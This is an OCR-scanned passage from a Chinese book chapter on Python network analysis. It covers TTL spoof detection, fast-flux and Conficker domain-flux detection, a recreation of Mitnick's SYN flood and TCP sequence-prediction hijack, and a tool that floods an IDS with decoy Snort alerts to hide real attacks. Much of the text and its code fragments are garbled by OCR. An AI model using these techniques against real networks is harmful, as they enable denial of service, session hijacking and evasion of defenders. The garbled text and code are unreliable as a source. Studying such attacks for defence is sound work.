个 包 应 该 是 一 个 ICMP 请 求 包 ， 这 样 目 标 主机 就 会 做 出 回应 。 一 旦 目标 主机 做 出 了 响应 ， 我 
们 就 把 TTL 值 存储 在 一 个 用 源 IP 地 址 作为 索引 的 词典 中 。 然 后 将 实际 收 到 的 TTL 与 原始 数 
据 包 中 的 TTL 放 在 一 起 ， 判 断 它 们 的 差 值 是 否 超过 了 一 个 阀 值 。 走 不 同 的 路 径 到 达 目 标 主机 
的 数据 包 所 经 过 的 路 由 设备 的 数量 可 能 会 有 所 差异 ， 因 此 其 TTL 也 可 能 不 完全 一 样 。 但 
是 ， 如 果 中 继 跳 数 的 差 超 过 了 5 跳 ， 则 可 以 推断 该 TTL 是 假 的 ， 并 在 屏幕 上 输出 一 条 警 
告 消息 。 

from scapy.all import * 

from IPy import IP as IPTEST 

ttlValues = {} 

THRESH = 5 

def checkTTL(ipsrc, ttl): | 

if IPTEST(ipsrc).iptype() == 'PRIVATE': © 
return 
if not ttlValues.has_key(ipsrc) : 
pkt = srl(IP(dst=ipsrc) / ICMP(), \ 
retry=0, timeout=1, verbose=0) 
ttlValues[ipsrc] = pkt.ttl > 
if abs(int(ttl) - int(ttlValues[ipsrc])) > THRESH: 
print '\n[{!] Detected Possible Spoofed Packet From: '\ 
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在 最 终 发 布 的 代码 中 ， 我 们 加 上 指定 要 监听 的 一 些 IP 地 址 ， 以 及 设置 TTL 效 值 的 参数 解 
析 代 码 。 使 用 不 到 50 行 代码 就 有 了 H.D. Moore 十 多 年 前 解决 五 角 大 楼 困境 的 解决 方案 。 
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运行 我 们 的 代码 发 现 : 由 于 TTL 值 13 与 〈 来 自我 们 的 假 数据 包 ) 的 TTL 值 53 不 一 致 ， 
它 正确 地 识别 出 了 来 自 8.8.8.8 的 Nmap 伪装 扫描 。 必 须 注意 的 是 : 我 们 的 值 是 根据 Linux 中 
默认 的 TTL 初始 值 64 而 得 到 的 。 尽 管 RFC 1700 中 建议 把 默认 的 TTL 值 设 为 64， 但 是 自 MS 
Windows NT 4.0 起 ， 微 软 Windows 就 已 经 把 TTL 的 初始 值 设 为 128 了 。 此 外 ， 其 他 一 些 类 
UNIX 系统 也 会 使 用 不 同 的 TTL 初始 值 ， 比 如 Solaris 2.x 的 默认 TTL 初始 值 就 是 255。 现 
在 ， 我 们 先 把 这 个 脚本 放 一 放 ， 并 假设 假 数 据 包 是 来 自 Linux 系统 机 器 的 。 





“ME” (Storm) 的 fast-flux 和 Conficker 的 domain 一 flux 


2007 年 ， 安 全 研究 人 员 发 现 了 一 种 新 的 在 臭名 昭著 的 风暴 (Storm) 僵尸 网 络 上 使 用 的 技 
术 (Higgins, 2007) 。 这 种 名 为 fast-flux 的 技术 使 用 域名 服务 (DNS) 记录 隐藏 指挥 风暴 僵 
尸 网 络 的 控制 与 命令 信道 。DNS 记录 一 般 是 用 来 将 域名 转换 成 IP 地 址 的 。 当 DNS 服务 器 返 
回 一 个 结果 时 ， 它 也 会 同时 指定 一 个 TTL 一 一 告诉 主机 这 个 IP 地 址 在 多 长 的 时 间 里 肯定 是 有 
效 的 ， 因 而 在 这 段 时 间 里 无 须 再 次 解析 该 域名 。 

风暴 僵尸 网 络 背 后 的 攻击 者 会 非常 频繁 地 改变 用 于 指挥 与 控制 服务 器 的 DNS 记录 。 事 实 
上 ， 他 们 使 用 了 分 布 在 50 多 个 国家 的 384 个 网 络 供应 商 手 上 的 2000 台 元 余 服务 器 (Lemos, 
2007) 。 攻 击 者 频繁 地 切换 指挥 与 控制 服务 器 的 IP 地 址 ， 并 在 DNS 查询 结果 中 返回 一 个 很 
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短 的 TTL。 这 种 快速 变化 IP 地 址 的 做 法 (fast-flux) 使 得 安全 研究 员 很 难 找 出 僵尸 网 络 的 指 
挥 与 控制 服务 器 ， 更 别 说 要 关 掉 这 些 服务 器 了 。 

尽管 使 用 fast-flux 之 后 ， 风 暴 僵尸 网 络 已 经 很 难 被 打垮 了 ， 但 不 到 一 年 ， 另 一 种 类 似 的 
技术 又 被 用 来 帮助 入 侵 了 200 多 个 国家 里 的 700 万 台电 脑 (Binde, 2011) Conficker 是 迄今 
为 止 最 成 功 的 电脑 蠕虫 病毒 ， 它 通过 Windows 服务 消息 块 (Windows Service Message Block, 
SMB) 协议 中 的 一 个 漏洞 传播 。 一 旦 被 感染 ， 有 漏洞 的 机 器 便 联 络 命令 与 控制 服务 器 ， 以 获 
得 进一步 的 指令 。 要 想 阻 止 攻 击 ， 识 别 并 阻 断 “ 肉 机 ”与 指挥 和 控制 服务 器 之 间 的 通信 是 绝 
对 必要 的 。 然 而 ， Conficker 每 三 个 小 时 会 使 用 UTC 格式 的 当前 日 期 和 时 间 生 成 一 批 不 同 的 
域名 。 对 Conficker 的 第 三 个 版 本 来 说 ， 这 意味 着 每 三 小 时 生成 50000 个 域名 。 攻 击 者 只 注册 
了 这 些 域名 中 的 很 少 一 部 分 ， 让 它们 能 映射 成 真正 的 IP 地 址 。 这 使 得 拦截 和 阻止 来 自命 令 与 
控制 服务 器 的 流量 变 得 十 分 困难 。 由 于 该 技术 是 轮流 使 用 域名 的 ， 所 以 研究 人 员 便 将 其 命名 
为 domain-flux。 下 面 将 编写 能 在 真实 环境 中 检测 出 fast-flux 和 domain-flux， 并 识别 出 攻击 的 
Python 脚本 。 


你 的 DNS 知道 一 些 不 为 你 所 各 的 吗 ? 


要 能 在 真实 环境 中 识别 出 fast-flux 和 domain-fltux， 我 们 先 通过 观察 因 某 次 域名 请 求 而 产 
生 的 流量 来 快速 复习 一 下 DNS 。 为 了 理解 DNS ， 我 们 进行 一 次 域名 查询 ， 查 询 
whitehouse.com 的 IP 地 址 。 注 意 : 我 们 的 DNS 服务 器 是 192.168.1.1， 它 把 whitehouse.com 转 
换 为 耻 地 址 74.117.114.119。 


en Asap nslookup whitehouse. com 


Server: ROOST GL Bo i 

Address: wi EO MST Sa i Soe baer i oneni an Be Fi? 
_ Non-authoritative answer: ea Piles ities haifa saat = 
“Name: ~~ ~whitehouse.com 

Address: | 974.117.114.119 


用 tcpdump 检查 DNS 查询 过 程 可 以 看 到 ， 我 们 的 客户 端 (192.168.13.37) 向 IP 地 址 为 
192.168.1.1 的 DNS 服务 器 发 送 了 一 次 请 求 。 具 体 地 说 ， 客 户 端 生成 一 个 DNS Question Record 
(DNSQR) ， 查 询 whitehouse.com 的 IPv4 地 址 。 服 务 器 响应 了 一 个 DNS Resource Record 
(DNSRR) ， 给 出 了 whitehouse.com 的 IP 地 址 。 


_ analyst# tcpdump -i eth0 -nn ‘udp port 53! : | 
07:45:46.529978 IP 192.168. ees 37.52120 >192.168.1.1.53: 63962+A? 
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使 用 Scapy 解 析 DNS 流 量 


在 用 Scapy 检查 这 些 DNS 协议 请 求 包 时 ， 我 们 要 检查 的 字段 在 DNSQR 和 DNSRR 包 都 
存在 。 一 个 DNSQR 包 中 含有 查询 的 名 称 (qname) 、 查 询 的 类 型 (qtype) 和 查询 的 类 别 
(qclass) 。 具 体 用 之 前 发 出 的 请 求 来 解释 ， 我 们 请 求 查询 whitehouse.com 的 IPv4 地 址 ， 所 以 
qname 字段 的 值 就 是 whitehouse.com。DNS 服务 器 会 响应 一 个 对 应 的 DNSRR， 其 中 含有 资源 
记录 名 名 称 (rmame) 、 类 型 (type) 、 资 源 记 录 类 别 (rclass) 和 TTL。 在 了 解 了 fast-flux 和 
domain-flux 的 工作 原理 之 后 ， 现 在 可 以 使 用 Scapy 编写 一 个 Python 脚本 来 分 析 和 识别 可 疑 的 
DNS 流量 。 


. a a a ee r ee = 
Peta | 4 yy ESO EAT = 3 TEL UE y’ f ‘ 

PORE i aia L VST g je r 
Pope i - as SE PEN ] > es "x 





欧洲 网 络 和 信息 安全 机 构 (The European Network and Information Security Agency) 提供 
了 一 个 分 析 网 络 流量 的 极 好 资源 ， 该 机 构 提 供 一 个 可 启动 的 DVD ISO 镜像 ， 其 中 还 含有 几 个 
网 络 抓 包 文件 和 练习 。 该 镜像 的 下 载 地 址 是 : http://www.enisa.europa.eu/activities/cert/support/ 
exercise/live-dvdiso-images。 练 习 7 中 有 一 个 演示 了 fast-flux 行为 的 Pcap 文件 。 此 外 ， 你 或 许 
希望 用 间谍 软件 或 恶意 软件 感染 一 台 虚 拟 机 ， 在 开始 之 前 ， 在 受 控 的 实验 环境 中 抓 取 流 量 。 
处 于 我 们 的 教学 目的 ， 这 里 假设 你 已 经 抓 到 了 一 个 名 为 fastFlux.pcap 的 抓 包 文件 ， 其 中 包含 
一 些 你 想 分 析 的 DNS 流量 。 
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用 Scapy 找 出 fast-flux 流 量 


我 们 来 写 一 个 Python 脚本 ， 从 这 个 pcap 文件 中 读 取 数据 ， 并 把 所 有 含 DNSRR 的 数据 包 
解析 出 来 。Scapy 含有 一 个 功能 强大 的 函数 haslayer()， 该 函数 接收 一 个 参数 一 一 协议 类 型 ， 
返回 一 个 布尔 值 。 如 果 数 据 包 中 含有 一 个 DNSRR， 我 们 将 提取 出 其 中 分 别 记 录 有 查询 的 域名 
和 对 应 的 IP 地 址 的 rmame 和 rdata 变量 。 然 后 用 得 到 的 域名 查询 我 们 维护 的 一 个 以 域名 作为 
索引 的 词典 。 如 果 我 们 之 前 已 经 见 过 该 域名 ， 将 检查 刚才 获得 的 IP 在 词典 中 有 没有 出 现 过 。 
如 果 词 典 中 没有 这 个 IP 地 址 ， 则 把 新 地 址 添加 到 词典 的 数组 中 。 反 之 ， 如 果 我 们 发 现 的 是 一 
个 新 域名 ， 也 将 把 它 添 到 我 们 的 词典 中 ， 并 把 刚才 获得 的 IP 地 址 记录 为 词典 中 记录 IP 数组 的 
第 一 个 元 素 。 

这 看 起 来 确实 有 点 复杂 ， 但 是 我 们 希望 尽 可 能 存储 所 有 的 域名 和 与 它们 有 关 的 所 有 IP 地 
址 。 为 了 检测 出 fast-flux， 需 要 知道 哪些 域名 对 应 有 多 个 地 址 。 检 查 所 有 的 数据 包 之 后 ， 打 印 
出 所 有 的 域名 ， 以 及 各 域名 对 应 有 多 少 个 互 不 重复 的 人 P 地址 。 


| : ` F We a see! i ar | ? 1 { 
f m 5 YE Fa abe” ees | Seat px 
: _ a SE y et t 






je 也 el MaN il SAIRE MUTE RE | TEN qs bette a A = fe D 


运行 我 们 的 代码 ， 我 们 看 到 至 少 有 四 个 域名 有 大 量 与 之 相关 的 IP 地 址 。 事 实 上 ， 以 下 列 
出 的 所 有 四 个 域名 过 去 都 是 fast-flux 使 用 的 (Nazario，2008) 。 
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用 Scapy 找 出 Domain Flux 流 量 


接 下 来 ， 我 们 先 来 分 析 感 染 了 Conficker 的 机 器 。 你 既 可 以 感染 自己 的 机 器 ， 也 可 以 从 互 
联网 上 下 载 一 些 样 本 抓 包 文件 。 在 许多 第 三 方 网 站 上 都 能 下 载 到 一 些 Conficker 网 络 抓 包 文 
件 。 因 为 Conficker 使 用 的 是 domain-flux 技术 ， 我 们 需要 寻找 的 就 是 那些 对 未 知 域名 查询 回 
复出 错 消息 的 服务 器 响应 包 。 不 同 版 本 的 Conficker 都 会 在 几 小 时 内 生成 许多 DNS 域名 。 
为 许多 域名 是 假 的 ， 使 用 它们 的 目的 是 为 了 掩盖 真正 的 命令 与 控制 服务 器 ， DNS 服务 器 是 没 
法 把 大 多 数 域名 转换 为 真正 的 IP 地 址 的 ， 对 这 些 域名 ， 服 务 器 回复 一 个 出 错 了 的 消息 。 我 们 
可 以 通过 找 出 所 有 含 域名 出 错 的 错误 代码 的 DNS 响应 包 的 方式 ， 实 时 地 识别 出 domain-flux。 
Conficker 里 虫 病毒 用 过 的 所 有 域名 清单 详 见 : http://www.cert.at/downloads/data/ conficker en. 
html。 

我 们 将 再 次 读 取 网 络 抓 包 文件 ， 并 逐一 检查 抓 包 文件 中 的 各 个 数据 包 。 我 们 只 检查 来 自 
服务 器 53 端口 的 数据 包 一 一 这 种 包 中 含有 资源 记录 。DNS 数据 包 中 有 一 个 rcode 字段 。 当 
rcode 等 于 3 时 ， 表示 的 是 域名 不 存在 。 然 后 把 域名 打印 在 屏幕 上 ， 并 更 新 所 有 未 得 到 应 答 的 
域名 请 求 的 计数 器 。 
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if 


print ZELI Hi E E TOEA 人 Name PATARA 


Siname: 
phe main() 


ae ep 


ta 
m 


请 注意 ， 我 们 在 运行 脚本 时 发 现 了 几 个 确实 在 Confice 的 domain-fluxr 中 被 用 过 的 域名 。 


成 功 ! 我 们 能 检测 出 攻击 了 。 在 下 一 节 中 ， 我 们 继续 使 用 分 析 技 能 重 现 一 


复杂 攻击 。 
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括 锅 取 企 业 价 值 数 百 万 美元 的 商业 秘密 。 在 超过 15 年 的 时 间 里 ，Kevin Mitnick 未 经 授权 访问 
计算 机 ， 窃 取 私 密 信 息 ， 并 骚扰 任何 试图 抓 住 他 的 人 员 (Shimomura, 1996) ， 但 最 终 一 个 团 
队 锁 定 了 Mitnick， 并 一 路 追踪 他 到 美国 北 卡罗来纳 州 首府 罗 利 (Raleigh, North Carolina) 。 

来 自 圣 地 亚 哥 一 头 长 发 的 计算 物理 学 家 Tsutomu Shimomura， 人 负责 协助 抓 捕 Mitnick 
(Markoff, 1995). 1992 年 ， 在 国会 就 手机 安全 作证 之 后 ，Shimomura 成 为 Mitnick 目标 。1994 
年 12 A, AAA Shimomura 家 用 电脑 系统 (Markoff，1995) , Shimomura 坚信 攻击 者 是 
Mitnick， 并 对 其 使 用 的 新 式 攻击 方法 非常 着 迷 ， 最 终 带 领 技术 小 队 在 第 二 年 追踪 到 了 
Mitnick 。 

令 Shimomura 着 迷 的 攻击 向 量 到 底 是 什么 呢 ? 这 种 方式 闻所未闻 。Mitnick 使 用 的 是 一 种 
劫持 TCP 会 话 的 方法 。 这 种 技术 被 称 为 TCP 序列 号 预测 ， 这 一 技术 利用 的 是 原本 设计 用 来 区 
分 各 个 独立 的 网 络 连接 的 “TCP) 序列 号 的 生成 缺乏 随机 性 这 一 缺陷 。 这 一 缺陷 加 上 IP 地 址 
欺骗 ， 使 得 Mitnick 能 够 劫持 Shimomura 家 用 电脑 中 的 某 个 连接 。 下 一 节 将 重 现 这 次 攻击 ， 
并 重 构 出 Mitnick 在 臭名 昭著 的 TCP 序列 号 预测 攻击 中 使 用 的 工具 。 


146 


第 4 章 用 Python 分 析 网 络 流量 


预测 你 目 己 的 TCP 序 列 号 


Mitnick 攻击 的 机 器 与 某 台 远程 服务 器 之 间 有 可 信 协 议 。 远 程 服务 器 可 以 通过 在 TCP 513 
端口 上 运行 的 远程 登录 协议 (rlogin) 访问 Mitnick 被 攻击 的 计算 机 。rlogin 并 没有 使 用 公 钥 / 
私 钥 协 议 或 口令 认证 ， 而 是 使 用 了 一 种 不 太 安 全 的 认证 方法 一 一 绑 定 源 卫 地 址 。 因 此 ， 为 了 
攻击 Shimomura 的 电脑 ，Mitnick 必须 做 到 以 下 4 点 : 

(1) 找到 一 个 受信 任 的 服务 器 。 

(2) 使 该 服务 器 无 法 再 做 出 响应 。 

(3) 伪造 来 自 服 务 器 的 一 个 连接 。 

, (4) 盲目 伪造 一 个 TCP 三 次 握手 的 适当 说 明 。 

这 听 起 来 比 实际 做 起 来 要 困难 。1994 年 1 月 25 H, Shimomura 在 USENET 博客 公布 了 有 
关 这 起 攻击 的 细节 (Shimomura, 1994) 。 通 过 研读 Shimomura 发 布 的 技术 细节 ， 我 们 将 分 析 这 
起 攻击 并 编写 一 个 能 完成 类 似 攻 击 的 Python 脚本 。 

Mitnick 找到 与 Shimomura 个 人 电脑 之 间 有 可 信 协 议 的 远程 服务 器 后 ， 需 要 使 远程 服务 器 
不 能 再 发 出 响应 。 如 果 远 程 服务 器 发 现 有 人 尝试 使 用 服务 器 IP 地 址 进行 假 连接 ， 它 将 发 送 
TCP 重 置 (reset) 数据 包 关 闭 连接 。 为 了 使 服务 器 无 法 再 做 出 响应 ，Mitnick 向 服务 器 上 的 远 
程 登录 (rlogin) 端口 发 出 了 许多 TCP SYN 数据 包 ， 即 SYN 泛 洪 攻击 (SYN Flood) ， 这 种 
攻击 将 会 填 满 服务 器 的 连接 队列 ， 使 之 无 法 做 出 任何 响应 。 在 Shimomura 公布 的 攻击 细节 
中 ， 我 们 看 到 向 目标 服务 器 的 远程 登录 端口 (rlogin) 发 出 的 一 系列 TCP SYN 包 。 
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使 用 Scapy 制 造 SYN 泛 洪 攻 击 


用 Scapy 重新 实现 SYN 泛 洪 攻击 其 实 很 简单 。 我 们 将 制造 一 些 载 有 TCP 协议 层 的 IP 数 
据 包 ， 让 这 些 包 里 TCP 源 端口 不 断 地 自 增 一 ， 而 目的 TCP 端口 总 是 为 513。 
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运行 攻击 代码 ， 我 们 发 送 的 TCP SYN 包 将 耗 尽 目标 的 资源 ， 填 满 其 连接 队列 ， 最 终 达到 
消除 目标 发 送 TCP-reset 数据 包 的 能 力 的 目的 。 





计算 TCP 序 列 号 


现在 攻击 变 得 更 加 有 意思 了 。 随 着 远程 服务 器 不 再 响应 ，Mitnick 能 够 伪造 一 个 TCP 连接 
到 目标 。 不 过 ， 这 取决 于 他 能 够 发 送 伪造 的 SYN 包 的 能 力 ， 紧 接着 ，Shimomura 的 机 器 会 返 
回 一 个 TCP SYN-ACK 包 确 认 连 接 。 为 了 完成 连接 ， Mitnick 需要 在 SYN-ACK 中 正确 地 猜 
出 TCP 的 序列 号 〈 因 为 他 无 法 观察 到 ) ， 然 后 把 猜 到 的 正确 的 TCP 序列 号 放 在 ACK 包 中 发 
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送 回 去 。 为 了 算出 正确 的 TCP 序列 号 ，Mitnick 从 名 为 apollo.itluc.edu 的 大 学 的 机 器 上 发 出 一 
系列 的 SYN 包 。 收 到 这 些 SYN 包 之 后 ，Shimomura 的 计算 机 (x-terminal) 将 会 响应 一 个 带 
TCP 序列 号 的 SYN-ACK 包 。 请 注意 在 下 面 截 取出 来 的 技术 细节 中 的 序列 号 : 2022080000、 

2022208000、2022336000、2022464000， 依 次 出 现 的 SYN-ACK 包 中 的 TCP 序列 号 之 间 的 差 
值 均 为 128000。 由 此 ，Mitnick 计算 出 正确 的 TCP 序列 号 是 十 分 容易 的 〈 需 要 注意 的 是 ， 如 
今 大 部 分 现代 操作 系统 会 提供 更 可 靠 的 随机 化 的 TCP 序列 号 ) 。 






为 了 在 Python 中 重 现 这 一 过 程 ， 我 们 将 发 送 一 个 TCP SYN 包 ， 然 后 等 待 TCP SYN-ACK 
包 。 收 到 之 后 ， 我 们 将 从 这 个 确认 包 中 读 出 TCP 序列 号 ， 并 把 它 打印 到 屏幕 上 。 我 们 将 把 这 
一 过 程 重复 四 次 ， 来 确认 模式 确实 存在 。 需 要 注意 的 是 ， 我 们 使 用 Scapy 时 ， 就 不 需要 手工 
填写 所 有 的 TCP 和 IP 字段 : Scapy 会 自动 填 上 这 些 值 。 此 外 ， 它 默认 会 从 我 们 的 源 IP 地 址 
发 送 。 我 们 的 新 函数 calTSN 将 接收 目标 IP 地 址 这 个 参数 ， 返 回 下 一 个 SYN-ACK 包 的 序列 
号 (当前 SYN-ACK 包 的 序列 号 加 上 差 值 ) 。 
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Jak ao 
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对 有 漏洞 的 目标 运行 我 们 的 代码 可 以 看 到 ， 随 机 的 TCP 序列 号 并 不 存在 。Shimomura 计 
算 机 上 也 有 相同 的 安全 漏洞 隐患 。 需 要 注意 的 是 : 默认 情况 下 ，Scapy 使 用 默认 的 TCP 80 端 
口 作为 目标 端口 。 攻 击 目标 计算 机 必须 运行 一 个 服务 ， 监 听 你 试图 假 连接 的 这 个 端口 。 


伪造 TCP 连 接 


有 了 正确 的 TCP 序列 号 之 后 ，Mitnick 就 能 发 动 攻击 了 。Mitnick 使 用 的 序列 号 为 
2024371200， 在 距 他 发 送 最 早 的 那个 探测 被 攻击 计算 机 的 SYN 包 后 ， 大 约 有 150 个 SYN 
包 。 首 先 ， 他 假冒 那 台 已 经 无 法 做 出 任何 应 答 的 服务 器 ， 发 起 了 一 个 连接 请 求 。 接 下 来 ， 他 
盲 发 了 一 个 序列 号 为 2024371201 的 ACK 包 ， 表 示 已 经 正常 建立 了 连接 。 j 










为 了 在 Python 中 重 现 这 一 行为 ， 我 们 将 创建 和 发 送 两 个 数据 包 。 首 先 ， 我 们 创建 一 个 
TCP 源 端口 为 S13， 目 标 端口 为 S14， 源 IP 地 址 为 被 假冒 的 服务 器 ， 目 标 IP 地 址 为 被 攻击 计 
算 机 的 SYN 包 。 接 着 ， 我 们 创建 一 个 相同 的 ACK 包 ， 并 把 计算 得 到 的 序列 号 填 入 相应 的 字 
段 中 ， 最 后 把 它 发 送出 去 。 


150 


第 4 章 用 Python 分 析 网 络 流量 


把 整个 代码 库 放 在 一 起 ， 我 们 还 要 添加 一 些 参数 解析 代码 ， 以 便 能 在 命令 行 参数 中 输入 
要 假冒 连接 的 地 址 、 目 标 服务 器 ， 以 及 一 开始 在 进行 SYN 泛 洪 攻击 时 使 用 的 假 地 址 。 


vs |! 
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运行 最 终 的 脚本 ， 我 们 已 经 成 功 地 再 现 Mitnick 约 20 年 前 的 攻击 。 这 个 曾 被 认为 是 历史 
上 最 复杂 的 攻击 ， 现 在 只 用 65 行 Python 代码 就 能 把 它 再 现 出 来 。 学 到 这 么 强 的 分 析 技 能 之 
后 ， 下 一 节 将 描述 一 种 愚弄 网 络 攻击 分 析 器 。 有 具体 地 说 ， 就 是 愚弄 入 侵 检测 系统 的 技术 。 
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使 用 Scapy 轧 弄 入 侵 检 测 系统 


入 侵 检 测 系 统 (Intrusion DetectionSystem, IDS) 是 老练 的 分 析 人 员 手 中 一 个 非常 有 价值 
的 工具 。 基 于 网 络 的 入 侵 检 测 系 统 (network-based intrusion detection system, NIDS) 可 以 通 
过 记录 流 经 P 网 络 的 数据 包 实 时 地 分 析 流 量 。 用 已 知 的 恶意 特征 码 对 数据 包 进 行 扫描 ，IDS 
可 以 在 攻击 成 功 之 前 就 向 网 络 分 析 师 发 出 警报 。 例 如 ，SNORT 这 个 IDS 系统 自 带 的 许多 不 同 
规则 ， 就 使 它 能 够 识别 出 许多 包括 不 同类 型 的 踩点 ， 漏 洞 利用 已 经 拒绝 服务 攻击 在 内 的 真实 
环境 中 攻击 手段 。 检 查 其 中 一 些 规则 配置 文件 中 的 内 容 ， 我 们 看 到 针对 TFN、tfn2k 和 Trin00 
分 布 式 拒绝 服务 攻击 工具 包 的 四 个 警报 触发 规则 。 当 攻击 者 用 TFN. tfn2k 或 Trin00 对 目标 进 
行 攻击 时 ，IDS 能 够 检测 到 攻击 ， 并 向 分 析 师 发 出 警报 。 然 而 ， 当 分 析 师 收 到 大 量 警告 ， 使 
他 们 难以 对 事件 进行 合理 判断 时 ， 会 发 生 什 么 情况 呢 ? 通 常 ， 他 们 变 得 不 知 所 措 ， 也 可 能 错过 
重要 的 攻击 细节 。 


| — 
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为 了 不 让 分 析 师 发 现 真 正 的 攻击 ， 我 们 将 编写 一 个 会 产生 大 量 需 要 分 析 人 员 处 理 的 警报 
的 工具 包 。 此 外 ， 分 析 人 员 也 可 以 使 用 这 个 工具 来 验证 IDS 是 否 能 够 正确 识别 出 恶意 流量 。 

编写 脚本 并 不 困难 ， 因 为 我 们 已 经 知道 了 警报 的 触发 规则 。 要 完成 这 一 任务 ， 需 要 再 次 使 用 
Scapy 生成 数据 包 。 先 来 看 第 一 条 警报 触发 规则 一 一 DDoS TFN 探 针 (DDoS TFN Probe) : 这 
里 必须 生成 一 个 ICMP ID 为 678、ICMPE TYPE 为 8， 且 包 中 含有 数据 “1234” 的 ICMP 数据 
包 。 使 用 Scapy 生成 了 一 个 符合 这 些 要 求 的 数据 包 ， 并 将 其 发 送 到 目标 地 址 上 。 此 外 ， 我 们 
还 要 为 其 他 三 个 警报 触发 规则 构建 数据 包 。 


i BY re aia 
~ 






运行 脚本 ,我 们 看 到 四 个 数据 包 被 发 送 到 目标 地 址 。IDS 会 去 分 析 这 些 数据 包 ， 如 果 有 
匹配 的 特征 码 ，IDS 将 会 发 出 警报 。 





第 4 章 用 Python 分 析 网 络 流量 


检查 一 下 SNORT 警报 日 志 ， 我 们 发 现 我 们 已 经 成 功 了 ! 所 有 的 四 个 数据 包 都 让 入 侵 检 测 
系统 产生 了 警报 。 







我 们 再 来 看 SNORT 的 exploit.rules 签名 文件 中 更 复杂 的 警报 触发 规则 。 这 里 ， 如 果 发 现 
了 一 个 指定 的 字 节 序列 ， 就 会 发 出 “ntalkd x86 Linux overflow” 和 “Linux mountd overflow” 
警报 。 
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为 了 生成 含有 指定 字 节 序列 的 数据 包 ， 我 们 可 以 使 用 符号 \ x， 后 面 跟 上 该 字 节 的 十 六 进 
制 值 。 对 第 一 个 警报 触发 规则 ， 这 次 生成 的 数据 包 中 应 该 含有 “ntalkd Linux overflow” java 
利用 代码 的 特征 码 。 对 第 二 个 警报 触发 规则 ， 我 们 使 用 了 一 种 用 十 六 进 制 值 和 ASCII 码 混合 
原始 字 节 序列 的 方法 。 注 意 ，89|F| 在 Python 代码 中 被 写成 了 \x89F， 这 表示 它 的 值 是 一 个 十 六 
进 制 值 ， 再 加 上 一 个 ASCII 字符 。 下 面 的 数据 包 将 产生 企图 利用 漏洞 的 警报 。 
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最 后 ， 伪 造 一 些 踩点 或 扫描 操作 也 挺 不 错 的 。 我 们 查看 SNORT 中 关于 扫描 的 警报 触发 规 
则 ， 找 到 两 个 可 以 生成 对 应 数据 包 的 警报 触发 规则 。 这 两 个 规则 检测 的 是 : 发 往 UDP 协议 上 
的 茶 些 特定 端口 的 数据 包 的 内 容 中 有 无 特定 的 特征 码 ， 如 果 有 ， 则 触发 警报 。 产 生 符 合 该 条 
件 的 数据 包 很 方便 。 






我 们 生成 了 两 个 会 触发 cybercop 扫描 器 和 Amanda 扫描 器 扫描 报警 的 数据 包 。 在 用 正确 
的 UDP 目标 端口 和 内 容 生 成 这 两 个 包 之 后 ， 我 们 把 它 发 送 给 目标 。 









现在 已 经 能 生成 会 触发 拒绝 服务 攻击 、 漏 洞 利用 (exploits〉 和 踩点 扫描 警报 的 数据 包 
了 ， 我 们 把 脚本 放 在 一 起 ， 并 添加 一 些 命令 行 参数 解析 代码 。 需 要 注意 的 是 : 用 户 名 必须 输 
入 目标 地 址 ， 和 否则 该 程序 将 退出 ， 如 果 用 户 没 有 输入 源 地 址 ， 我 们 将 生成 一 个 随机 的 源 地 
址 。 如 果 用 户 没 有 指定 发 送 这 些 数 据 包 的 次 数 ， 我 们 便 只 发 送 一 次 。 除 非 专门 指明 ， 脚 本 将 
使 用 默认 的 网 卡 eth0。 虽 然 在 本 文中 该 脚本 被 刻意 缩短 了 ， 但 还 可 以 继续 往 这 个 脚本 中 添加 
代码 ， 使 之 能 生成 各 种 类 型 的 攻击 行为 的 数据 包 ， 并 测试 报警 是 否 能 被 正常 触发 。 
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运行 最 终 的 脚本 ， 我 们 发 现 其 假冒 的 源 地 址 为 1.3.3.7， 它 正确 地 同 目标 地 址 发 送 了 8 个 
数据 包 。 由 于 我 们 的 目的 是 测试 ， 所 以 请 确保 目标 机 器 不 是 一 台 攻 击 者 的 机 器 。 


分 析 IDS 的 日 志 后 ， 我 们 发 现 其 很 快 被 8 个 报警 信息 填 满 了 。 漂 亮 ! 我 们 的 工具 包 奏 效 
了 ， 本 章 圆 满 结束 。 
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1.3.3.7. <>.192.168,1.106 | 

03/14-11:45:01.071205 [**] [1:313:4] EXPLOIT EE x86 Linux overflow 
rie [Classification: Attempted Administrator Privilege Gain] 
(Priority: 1) {UDP} 1. 3.3.7:53 -> 192.168.1.106:518 

03/14- -11:45:01.076879 [**] [1: 315:6] EXPLOIT x86 Linux mountd overflow 
[**] (Classification: Attempted Administrator Privilege Gain] 
(Priority: 1] {UDP} 1.3.3.7:53 -> 192.168.1.106:635 ， | 

03/14-11:45:01.079864 [**] [1:636:1] SCAN cybercop udp bomb peep 
(Classification: Potentially Bad Traffic] enue aL oa reas. 
1.3.3.7:53.-> 192.168.1.106:7 

03/14-11:45:01.082434 [**] [1:634:2] SCAN Auge client tt request 
[**] [Classification: Attempted Information Leak] [Priority: 2]. 
{UDP} 1.3.3.7:53 -> 192.168.1.106:10080 


本 草 小 结 


恭喜 ! 我 们 在 本 章 写 了 不 少 分 析 网 络 流量 的 工具 。 一 开始 ， 我 们 写 了 一 个 能 够 检测 出 极光 
攻击 的 基础 性 工具 。 接 下 来 ， 我 们 编写 脚本 实时 检测 黑客 组 织 “ 匿 名 者 ”的 LOIC 工具 包 。 
再 往 下 ， 我 们 重 现 了 17 岁 少 年 H. D. Moore 使 用 程序 检测 对 五 角 大 楼 进行 的 伪装 网 络 扫描 。 
接 下 来 ， 我 们 创建 了 一 些 脚本 ， 检 测 风暴 (Storm) 僵尸 网 络 和 蠕虫 病毒 (Conficker) 中 利用 
DNS 掩盖 命令 与 控制 信道 的 做 法 。 当 我 们 能 分 析 流 量 后 ， 我 们 再 现 了 20 年 前 Kevin Mitnick 
发 起 的 攻击 。 最 后 ， 利 用 网 络 分 析 技 能 生成 能 够 愚弄 IDS 的 数据 包 。 和 希望 在 本 章 你 能 学 会 各 
种 分 析 网 络 流量 的 极 好 技能 。 这 些 研 究 成 果 在 下 一 章 中 会 很 有 用 ， 因 为 在 第 5 章 将 编写 工具 
审计 无 线 网 络 和 移动 设备 。 
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第 5 章 ”用 Python 进行 无 线 网 络 攻击 


本 章 简介 : 


© 嗅 探 无 线 网 络 突 探 个 人 隐私 

。 监听 首选 网 络 并 识别 隐藏 的 无 线 热点 
© 控制 无 人 机 

。 识别 使 用 中 的 “ 火 绵 羊 ” 工 具 

。 搜寻 蓝牙 信号 

。 利用 蓝牙 中 的 漏洞 


增长 知识 的 过 程 可 不 像 种 树 ， 只 要 挖 个 洞 、 埋 下 种 子 、 盖 上 土 ， 然 后 每 天 
